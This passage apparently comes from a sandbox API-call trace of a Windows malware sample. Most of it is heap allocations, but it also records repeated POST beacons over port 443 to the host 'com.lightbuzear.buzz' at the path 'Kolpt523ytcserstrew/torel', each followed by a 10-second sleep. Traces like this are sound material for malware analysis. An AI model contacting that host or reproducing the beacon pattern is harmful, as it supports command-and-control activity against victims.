0x47ce5a0 [0286.359] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0286.359] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0286.359] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eba0 [0286.359] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebb8 [0286.359] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eba0 | out: hHeap=0x4780000) returned 1 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0286.360] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0286.360] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eb88 [0286.360] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf220 [0286.360] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf220 | out: hHeap=0x4780000) returned 1 [0286.360] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0286.360] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0286.360] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0286.360] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ecc0 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecd8 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecc0 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecd8 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf248 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0286.361] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf248 | out: hHeap=0x4780000) returned 1 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf1f8 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0286.361] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf248 [0286.362] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0286.362] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0286.362] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0286.362] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0286.362] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf248 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec30 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec48 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec48 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf298 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0286.363] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf248 [0286.363] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0286.364] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf220 [0286.364] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0286.364] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0286.364] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0286.364] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0287.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf220 | out: hHeap=0x4780000) returned 1 [0287.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0287.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0287.414] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0287.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0287.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0287.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0287.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0287.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0287.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0287.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0287.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0287.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebe8 [0287.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eae0 [0287.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebe8 | out: hHeap=0x4780000) returned 1 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0287.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf298 [0287.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0287.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf220 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0287.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0287.416] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0287.416] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0287.417] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0287.418] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0287.418] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0287.419] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0287.419] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0287.419] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0287.419] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0287.419] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0287.419] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0287.419] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0287.419] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0287.419] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf270 [0287.420] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0287.420] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0287.420] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf270 | out: hHeap=0x4780000) returned 1 [0287.420] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf270 [0287.420] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0287.420] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0287.420] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0287.421] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0287.421] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0287.421] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0287.421] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0287.421] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0287.422] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0287.422] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0287.422] FreeLibrary (hLibModule=0x71570000) returned 1 [0287.422] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0287.422] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0287.422] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0287.423] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0287.423] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0287.423] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0287.423] Sleep (dwMilliseconds=0x2710) [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0287.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0287.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0287.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0287.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ecc0 [0287.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eac8 [0287.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecc0 | out: hHeap=0x4780000) returned 1 [0287.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0287.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eac8 | out: hHeap=0x4780000) returned 1 [0287.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ebe8 [0287.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0287.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0287.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0287.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0287.437] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed38 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed08 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed38 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed08 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bed48 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0287.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0287.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0287.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0287.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0287.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0287.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0287.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0287.440] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0287.440] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0287.440] FreeLibrary (hLibModule=0x71780000) returned 1 [0287.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0287.441] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0287.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0287.441] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0287.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0287.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0287.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0287.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0287.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0287.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0287.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0287.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0287.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0287.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0287.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0287.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec78 [0287.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0287.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0287.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0287.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ecc0 [0287.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0287.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0287.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0287.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0287.442] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0287.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0287.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0287.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0287.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0287.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec00 [0287.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0287.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ec48 [0287.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be578 [0287.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be578 | out: hHeap=0x4780000) returned 1 [0287.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0287.444] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0287.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0287.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0287.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0287.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0287.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0287.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0287.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0287.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 